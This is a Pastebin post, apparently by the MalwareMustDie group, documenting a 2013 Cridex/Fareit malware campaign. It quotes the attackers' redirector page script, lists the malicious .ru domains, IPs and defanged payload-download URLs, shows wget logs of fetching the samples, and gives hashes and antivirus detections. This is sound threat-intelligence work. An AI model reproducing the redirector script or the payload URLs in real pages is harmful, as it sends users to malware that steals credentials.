SHARE
TWEET

PWS Cridex/fareit Today - 2013 03-14

MalwareMustDie Mar 13th, 2013 412 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. #MalwareMustDie! On duty: @unixfreaxjp ~]$ date
  2. Thu Mar 14 02:28:24 JST 2013
  3. Credit: thanks for @hugbomb and @nyxbone
  4. // Case: http://malwaremustdie.blogspot.jp/2013/02/bhek-cridex-combo-with-ransomware.html
  5. // Case: http://malwaremustdie.blogspot.com/2013/03/ru8080columnphp-hey-stealer-what-do-you.html
  6. // Rgx: http://goo.gl/KvD2q
  7.  
  8. #Cridex domains today:
  9.  
  10. // infector pattern a redirector pages:
  11.  
  12. <html>
  13.  <head>
  14.   <meta h00p-equiv="Content-Type" content="text/html; charset=utf-8">
  15. <title>Please wait</title>
  16.  </head>
  17.  <body>  
  18. <h2><b>Please wait a moment ・・・  You will be forwarded・ </h2></b>
  19. <h5>Internet Explorer and Mozilla Firefox compatible only</h5><br>
  20.  
  21. <script>
  22. var1=49;
  23. var2=var1;
  24. if(var1==var2) {document・location="h00p://giimiiifo・ru:8080/forum/links/column・php";}
  25. </script>
  26.  
  27. </body>
  28. </html>
  29.  
  30. //domains:PORT (all)
  31. gimiiiank.ru:8080
  32. giimiiifo.ru:8080
  33. giminaaaao.ru:8080
  34. giminkfjol.ru:8080
  35. giliaonso.ru:8080
  36. forumny.ru:8080
  37. forum-ny.ru:8080
  38. forumla.ru:8080
  39. forum-la.ru:8080
  40. foruminanki.ru:8080
  41. forumilllionois.ru:8080
  42.  
  43. //IP:
  44. 94・102・14・239,
  45. 213・215・240・24,
  46. 93・174・138・48
  47.  
  48. //payload url:
  49. h00p://gimiiiank・ru:8080/forum/links/column・php?gf=2w:1l:1l:2v:1f&xe=2v:1k:1m:32:33:1k:1k:31:1j:1o&r=1k&hy=e&gy=m
  50. h00p://giimiiifo・ru:8080/forum/links/column・php?gf=2w:1l:1l:2v:1f&xe=2v:1k:1m:32:33:1k:1k:31:1j:1o&r=1k&hy=e&gy=m
  51. h00p://giminaaaao・ru:8080/forum/links/column・php?gf=2w:1l:1l:2v:1f&xe=2v:1k:1m:32:33:1k:1k:31:1j:1o&r=1k&hy=e&gy=m
  52. h00p://giminkfjol・ru:8080/forum/links/column・php?gf=2w:1l:1l:2v:1f&xe=2v:1k:1m:32:33:1k:1k:31:1j:1o&r=1k&hy=e&gy=m
  53. h00p://giliaonso・ru:8080/forum/links/column・php?gf=2w:1l:1l:2v:1f&xe=2v:1k:1m:32:33:1k:1k:31:1j:1o&r=1k&hy=e&gy=m
  54. h00p://forumny・ru:8080/forum/links/column・php?gf=2w:1l:1l:2v:1f&xe=2v:1k:1m:32:33:1k:1k:31:1j:1o&r=1k&hy=e&gy=m
  55. h00p://forum-ny・ru:8080/forum/links/column・php?gf=2w:1l:1l:2v:1f&xe=2v:1k:1m:32:33:1k:1k:31:1j:1o&r=1k&hy=e&gy=m
  56. h00p://forumla・ru:8080/forum/links/column・php?gf=2w:1l:1l:2v:1f&xe=2v:1k:1m:32:33:1k:1k:31:1j:1o&r=1k&hy=e&gy=m
  57. h00p://forum-la・ru:8080/forum/links/column・php?gf=2w:1l:1l:2v:1f&xe=2v:1k:1m:32:33:1k:1k:31:1j:1o&r=1k&hy=e&gy=m
  58. h00p://foruminanki・ru:8080/forum/links/column・php?gf=2w:1l:1l:2v:1f&xe=2v:1k:1m:32:33:1k:1k:31:1j:1o&r=1k&hy=e&gy=m
  59. h00p://forumilllionois・ru:8080/forum/links/column・php?gf=2w:1l:1l:2v:1f&xe=2v:1k:1m:32:33:1k:1k:31:1j:1o&r=1k&hy=e&gy=m
  60.  
  61. //payload download snapshot:
  62. http://urlquery.net/report.php?id=1407705
  63. http://urlquery.net/report.php?id=1407845
  64. http://urlquery.net/report.php?id=1407852
  65. http://urlquery.net/report.php?id=1407854
  66. http://urlquery.net/report.php?id=1407859
  67. http://urlquery.net/report.php?id=1407866
  68. http://urlquery.net/report.php?id=1407806
  69. http://urlquery.net/report.php?id=1407807
  70. http://urlquery.net/queued.php?id=17250910
  71. http://urlquery.net/report.php?id=1407711
  72.  
  73. //some of the download logs as PoC (text):
  74. --2013-03-14 02:17:05--  h00p://gimiiiank・ru:8080/forum/links/column・php?gf=2w:1l:1l:2v:1f&xe=2v:1k:1m:32:33:1k:1k:31:1j:1o&r=1k&hy=e&gy=m
  75. Resolving gimiiiank・ru・・・ 94・102・14・239, 213・215・240・24, 93・174・138・48
  76. Connecting to gimiiiank・ru|94・102・14・239|:8080・・・ connected・
  77. h00p request sent, awaiting response・・・ 200 OK
  78. Length: 175104 (171K) [application/x-msdownload]
  79. Saving to: `sample1・exe'
  80. 2013-03-14 02:17:09 (63・6 KB/s) - `sample1・exe' saved [175104/175104]
  81.  
  82. --2013-03-14 02:17:36--  h00p://giminaaaao・ru:8080/forum/links/column・php?gf=2w:1l:1l:2v:1f&xe=2v:1k:1m:32:33:1k:1k:31:1j:1o&r=1k&hy=e&gy=m
  83. Resolving giminaaaao・ru・・・ 94・102・14・239, 213・215・240・24, 93・174・138・48
  84. Connecting to giminaaaao・ru|94・102・14・239|:8080・・・ connected・
  85. Saving to: `sample2・exe'
  86. 2013-03-14 02:17:40 (62・8 KB/s) - `sample2・exe' saved [175104/175104]
  87.  
  88. --2013-03-14 02:18:07--  h00p://giimiiifo・ru:8080/forum/links/column・php?gf=2w:1l:1l:2v:1f&xe=2v:1k:1m:32:33:1k:1k:31:1j:1o&r=1k&hy=e&gy=m
  89. Resolving giimiiifo・ru・・・ 94・102・14・239, 213・215・240・24, 93・174・138・48
  90. Connecting to giimiiifo・ru|94・102・14・239|:8080・・・ connected・
  91. h00p request sent, awaiting response・・・ 200 OK
  92. Length: 175104 (171K) [application/x-msdownload]
  93. Saving to: `sample3・exe'
  94. 2013-03-14 02:18:12 (65・0 KB/s) - `sample3・exe' saved [175104/175104]
  95.  
  96. // same sample PoC:
  97.  
  98. $ md5 sample*
  99.  
  100. [Path] / filename                              MD5 sum
  101. -------------------------------------------------------------------------------
  102. [C:\Program Files\GnuWin32-new\bin\]
  103. sample1・exe                                    f0063edef419009b1564e5fba81157db
  104. sample2・exe                                    f0063edef419009b1564e5fba81157db
  105. sample3・exe                                    f0063edef419009b1564e5fba81157db
  106.  
  107.  
  108. [8]VirusTotal : https://www.virustotal.com/en/file/028b2eccba3d7e0792e4fcab685c4003c7bb297773f5b14b3cfe55c62a41304a/analysis/
  109. SHA256: 028b2eccba3d7e0792e4fcab685c4003c7bb297773f5b14b3cfe55c62a41304a
  110. SHA1: fb570e861a9388327a77635ca0568d4b73342296
  111. MD5: f0063edef419009b1564e5fba81157db
  112. File size: 171・0 KB ( 175104 bytes )
  113. File name: contacts・exe / info・exe / calc・exe
  114. File type: Win32 EXE
  115. Tags: peexe
  116. Detection ratio: 3 / 44
  117. Analysis date: 2013-03-13 15:40:26 UTC ( 1 hour, 52 minutes ago )
  118.  
  119. Malwarebytes             : Trojan・Zbot
  120. AhnLab-V3                : Spyware/Win32・Zbot
  121. Kaspersky                : HEUR:Trojan・Win32・Generic
  122.  
  123. ---
  124. #MalwareMustDie!!
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
Top